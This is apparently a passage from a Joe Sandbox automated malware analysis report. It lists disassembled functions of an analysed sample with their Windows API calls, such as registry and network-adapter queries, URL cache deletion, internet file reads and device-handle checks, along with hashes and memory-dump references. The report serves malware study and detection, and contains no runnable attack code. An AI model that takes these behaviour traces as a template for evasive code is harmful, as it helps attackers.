                                                                                  Function 0041B830 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 655COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: F
                                                                                  • API String ID: 2102423945-1304234792
                                                                                  • Opcode ID: d157b17135fd8255c8e28f4bde1e089f3b5eb0567e5fce3e3265f600427212eb
                                                                                  • Instruction ID: e8d7c0d6537a5ad1590249065c503e5ee6ee561c2ecb59cfbb03b93e9203c571
                                                                                  • Opcode Fuzzy Hash: d157b17135fd8255c8e28f4bde1e089f3b5eb0567e5fce3e3265f600427212eb
                                                                                  • Instruction Fuzzy Hash: 4E62C578E00219CFDB18CF58C591BADF7B2EF89304F1481AAD509AB356C731A982CF95
                                                                                  Function 00437300 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: P
                                                                                  • API String ID: 2102423945-3110715001
                                                                                  • Opcode ID: 79b33b04ecd81b7b26b4da7c72efe8202acbb1167d3c2508a9ea62ed40ef21e9
                                                                                  • Instruction ID: 4cdbe40f1d6773fa6549660da25073c8146245c1545fe07f1305ac3c90668c37
                                                                                  • Opcode Fuzzy Hash: 79b33b04ecd81b7b26b4da7c72efe8202acbb1167d3c2508a9ea62ed40ef21e9
                                                                                  • Instruction Fuzzy Hash: D9F1F6B49052289FDB28DF15CC91BEEB7B5AF88305F1081DAE509A7391DB34AE84CF54
                                                                                  Function 004423D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 258COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID: u(D
                                                                                  • API String ID: 1579825452-2174179466
                                                                                  • Opcode ID: 9ad3dc38c1afe02415ec2545f214c67b0be82467d31b97765da59d2af10f2b64
                                                                                  • Instruction ID: 4d8144dfa48d5f4a2e1b2bb603548d377d75d7103db35a8e30dda7c2a483e823
                                                                                  • Opcode Fuzzy Hash: 9ad3dc38c1afe02415ec2545f214c67b0be82467d31b97765da59d2af10f2b64
                                                                                  • Instruction Fuzzy Hash: 96C16CB1D042289BEB24DB64CD957EEBBB0AF09304F9445DAE408A7341D7B99EC0CF95
                                                                                  Function 0042F5D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0042F634
                                                                                  • ShowWindow.USER32(?,00000005,?,?,?,?,?,?), ref: 0042F735
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID: ?7@
                                                                                  • API String ID: 1268545403-917346843
                                                                                  • Opcode ID: 8d1f17f3a2119bd407813befb5ae48325cf47bdfe96ce7cbf06e739975434adc
                                                                                  • Instruction ID: 9ce001e05f7c25cb85c81b34418281e311073d2a0965e9b3245ca6fb702ba2f0
                                                                                  • Opcode Fuzzy Hash: 8d1f17f3a2119bd407813befb5ae48325cf47bdfe96ce7cbf06e739975434adc
                                                                                  • Instruction Fuzzy Hash: 1B510775A00209AFCB04DF98D890EEEBBB5FF8C314F548569E501AB351D739A886CF64
                                                                                  Function 004081C6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: vc8
                                                                                  • API String ID: 2102423945-3387903242
                                                                                  • Opcode ID: 87969fae044daf841959f631da73f503019689e2379141943e5d022dcd72ac50
                                                                                  • Instruction ID: 495631a13cb7595f835668c7758c9e683d10a27a96dccf2654daafc68e8f3d49
                                                                                  • Opcode Fuzzy Hash: 87969fae044daf841959f631da73f503019689e2379141943e5d022dcd72ac50
                                                                                  • Instruction Fuzzy Hash: 25510FF19001189BDB64DB50DC51BDEB778AB44308F0005EEE60967282EF796E88CF59
                                                                                  Function 0040888E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegEnumKeyExA.KERNEL32(?,?,?,?,00000100,00000000,00000000,00000000,00000000), ref: 00408976
                                                                                  • RegQueryValueExA.KERNEL32(?,?,NetCfgInstanceID,00000000,?,?,00000100), ref: 004089E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumQueryValue
                                                                                  • String ID: NetCfgInstanceID
                                                                                  • API String ID: 4273652603-3223525923
                                                                                  • Opcode ID: 60bc4842129b8c35e24109bc6535799e8b03e4fa34e1e552bdc3e16674a9439d
                                                                                  • Instruction ID: 25bb501c8ee22f440934b30616bae800add402fd604372c4df788b816d27371c
                                                                                  • Opcode Fuzzy Hash: 60bc4842129b8c35e24109bc6535799e8b03e4fa34e1e552bdc3e16674a9439d
                                                                                  • Instruction Fuzzy Hash: 534186709042AC9EDB21CB54CC89BDABBB89F19704F0441DD914C66281DBB95FC4CF65
                                                                                  Function 6A6F30B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6F2FBC: GetModuleHandleA.KERNEL32(KERNEL32,6A6F30D6,?,?), ref: 6A6F2FCA
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6A6F2FEB
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6A6F2FFD
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6A6F300F
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6A6F3021
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 6A6F30F0
                                                                                  • SetLastError.KERNEL32(0000006F), ref: 6A6F3107
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                                                                                  • String ID:
                                                                                  • API String ID: 2524245154-3916222277
                                                                                  • Opcode ID: cbd7cf8dce129c45847f863d7b7b13b72717419ce8afb81778e782e6a0476d19
                                                                                  • Instruction ID: e2daf62b463ad6153f6f5519d31688bdd6b69e8e2bce8bcbc129acd7a2fff498
                                                                                  • Opcode Fuzzy Hash: cbd7cf8dce129c45847f863d7b7b13b72717419ce8afb81778e782e6a0476d19
                                                                                  • Instruction Fuzzy Hash: 77214C708002189EDB60DFB4D84CBDEB7F5BF04324F104AAAD069D6180DF749A8ADF55
                                                                                  Function 0040B300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup__strlwr
                                                                                  • String ID: DjSsafe
                                                                                  • API String ID: 2284447004-3306479776
                                                                                  • Opcode ID: 3e7b47a98169f4fb903aa7e7ccdf235ea4870650a1a6d6f1b50e94fb8cec12be
                                                                                  • Instruction ID: 9b1c280c3fbc3eafd935c78e6036a3b33b4325c557620fda8f81a8e2950b848f
                                                                                  • Opcode Fuzzy Hash: 3e7b47a98169f4fb903aa7e7ccdf235ea4870650a1a6d6f1b50e94fb8cec12be
                                                                                  • Instruction Fuzzy Hash: D221D870A042489FDB10DB24CC56BDE7BB89F16304F0441EDE64CAB282E7795B85CBA7
                                                                                  Function 6A6EF7FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 6A6EF822
                                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 6A6EF838
                                                                                    • Part of subcall function 6A6EF58B: __EH_prolog3_GS.LIBCMT ref: 6A6EF595
                                                                                    • Part of subcall function 6A6EF58B: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,6A6EF85C,?,?), ref: 6A6EF5C5
                                                                                    • Part of subcall function 6A6EF58B: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6A6EF5D9
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF615
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF623
                                                                                    • Part of subcall function 6A6EF58B: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6A6EF640
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF66B
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6A6EF674
                                                                                    • Part of subcall function 6A6EF58B: GetModuleFileNameA.KERNEL32(6A6D0000,?,00000105), ref: 6A6EF729
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                  • String ID: %s%s.dll
                                                                                  • API String ID: 1311856149-1649984862
                                                                                  • Opcode ID: 1c7bd06e26e36d0302910d0bb4088019f116c70a7e24de836b7154b6ceebf26c
                                                                                  • Instruction ID: b04dcd499b10e0ce4af8b572cc6ffd21cc05367d93f5b7c976fc64ad14d804e6
                                                                                  • Opcode Fuzzy Hash: 1c7bd06e26e36d0302910d0bb4088019f116c70a7e24de836b7154b6ceebf26c
                                                                                  • Instruction Fuzzy Hash: 3E016D71605158ABCB15DB68DD45AEB77FCBF4AB04F0504A5E506E7141DA709E048BA0
                                                                                  Function 6A6E2AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PowerChange,00000000,00000003,00000000,00000003,00000080,00000000,6A6D18D5), ref: 6A6E2AF6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E2B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: \\.\PowerChange
                                                                                  • API String ID: 3498533004-3103612388
                                                                                  • Opcode ID: bfd05043d4fcdf21b26ed678b93c856830ec02764f6318e1da7cbfd1b3014044
                                                                                  • Instruction ID: 2878fe75f7eaf4180bf403057b77152cfd1ecfa7afdfc268bf32bae8c16213a6
                                                                                  • Opcode Fuzzy Hash: bfd05043d4fcdf21b26ed678b93c856830ec02764f6318e1da7cbfd1b3014044
                                                                                  • Instruction Fuzzy Hash: CBD0C9703CB241B2FD7105788D2BF45219EB706B15FA006A0B622F95C09ED55A494904
                                                                                  Function 6A6E2ADF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PowerChange,00000000,00000003,00000000,00000003,00000080,00000000,6A6D18D5), ref: 6A6E2AF6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E2B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: \\.\PowerChange
                                                                                  • API String ID: 3498533004-3103612388
                                                                                  • Opcode ID: 36305ad77bd1b875c30406aa14e59a21d0a7596216e9d906d5ff179ff632fa4b
                                                                                  • Instruction ID: 772cdc43d1144f1ce71f2f4d1dcbfb7d2f4aabd965fd7f91f1f427d5f5242838
                                                                                  • Opcode Fuzzy Hash: 36305ad77bd1b875c30406aa14e59a21d0a7596216e9d906d5ff179ff632fa4b
                                                                                  • Instruction Fuzzy Hash: CED0A770245341AAEE2516348E1FF40B69DBB03714F5447E5B511FA0D2D7A459488944
                                                                                  Function 0040A370 Relevance: 4.6, APIs: 3, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstUrlCacheEntryA.WININET(?,00000000,00000000,00000000,004A5150), ref: 0040A3BA
                                                                                  • DeleteUrlCacheEntry.WININET(?,?,?,00000000,00000000,00000000), ref: 0040A3F8
                                                                                  • FindNextUrlCacheEntryA.WININET(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0040A40F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CacheEntry$Find$DeleteFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 1671618332-0
                                                                                  • Opcode ID: b397d3ea5c834a6be8775aa0cde3b0283fe63e3f3cbab400804fdce79be67614
                                                                                  • Instruction ID: 52b86d61c30880ceb6cdf9b80abca1666db05e4f08a02f18bbf1a4d64cc4fc88
                                                                                  • Opcode Fuzzy Hash: b397d3ea5c834a6be8775aa0cde3b0283fe63e3f3cbab400804fdce79be67614
                                                                                  • Instruction Fuzzy Hash: 07410DB1D10209AFDB04DBA4C986FEFB7B8EF48704F204219F515B7281D779AA05CBA5
                                                                                  Function 0044BE27 Relevance: 4.6, APIs: 3, Instructions: 88filenetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetReadFile.WININET(?,?,?,?,?), ref: 0044BE58
                                                                                    • Part of subcall function 0044B996: __EH_prolog3.LIBCMT ref: 0044B99D
                                                                                  • _memset.LIBCMT ref: 0044BED2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileH_prolog3InternetRead_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2946029256-0
                                                                                  • Opcode ID: 95cbd30d01359a4a34f8b0acb229894c011b7fa46d8c71f1875a4e07254a5c1b
                                                                                  • Instruction ID: ebc7df274186f541ff6877d53449bc54c43384d211bc78e8768696c573c92585
                                                                                  • Opcode Fuzzy Hash: 95cbd30d01359a4a34f8b0acb229894c011b7fa46d8c71f1875a4e07254a5c1b
                                                                                  • Instruction Fuzzy Hash: 2421AE31100A40ABEB71DF25CE81B97BBF9FF80304F54581AE68286A61D375F854CB94
                                                                                  Function 00432D20 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 1975251954-0
                                                                                  • Opcode ID: eb48f75c9c828d19f7f82149db90c7579b2714b87fdc16766e68dc9b241f72e6
                                                                                  • Instruction ID: ca9936ac93ab54a64ad8a0f8cee0fd065c5e47018f666c2a9947ffe2336715b6
                                                                                  • Opcode Fuzzy Hash: eb48f75c9c828d19f7f82149db90c7579b2714b87fdc16766e68dc9b241f72e6
                                                                                  • Instruction Fuzzy Hash: 622194B1D0020CEBCB10DB94DD46BDDB778AB58308F1445D9E504A7282EBB9AF89CF95
                                                                                  Function 6A6D2410 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc_memset_sprintf_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3423381085-0
                                                                                  • Opcode ID: c256f238be2ceeb92c75f2fbf6856b8875e1761a2a9a66ae50ed1448295aee7e
                                                                                  • Instruction ID: a3c4378de8374e7ec5d76158ced12fb686b181e1f3b831a36acc6cab5ac9a0de
                                                                                  • Opcode Fuzzy Hash: c256f238be2ceeb92c75f2fbf6856b8875e1761a2a9a66ae50ed1448295aee7e
                                                                                  • Instruction Fuzzy Hash: 7F21A9B2504201ABC324DF28C888A97BBE4BF8A744F014929E548C7240EF31F948CBE5
                                                                                  Function 0046A8B1 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,0049EA78,0000000C,00472D2E,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80), ref: 0046A91A
                                                                                    • Part of subcall function 00476312: __mtinitlocknum.LIBCMT ref: 00476328
                                                                                    • Part of subcall function 00476312: __amsg_exit.LIBCMT ref: 00476334
                                                                                  • ___sbh_find_block.LIBCMT ref: 0046A8DA
                                                                                  • ___sbh_free_block.LIBCMT ref: 0046A8E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeHeap___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 3132717848-0
                                                                                  • Opcode ID: ff0f6c8d1285e46660d1b8bce900bc90798cdcdca3b7363f068bbd1994c2452d
                                                                                  • Instruction ID: f04565eebed0a9506ea07e7e13c6955fc022d4e191335730864cec16c62f9766
                                                                                  • Opcode Fuzzy Hash: ff0f6c8d1285e46660d1b8bce900bc90798cdcdca3b7363f068bbd1994c2452d
                                                                                  • Instruction Fuzzy Hash: 3801DF71801A01B9DF206B629806B5A26749F01324F31482FF808761A2EE3C99548E9F
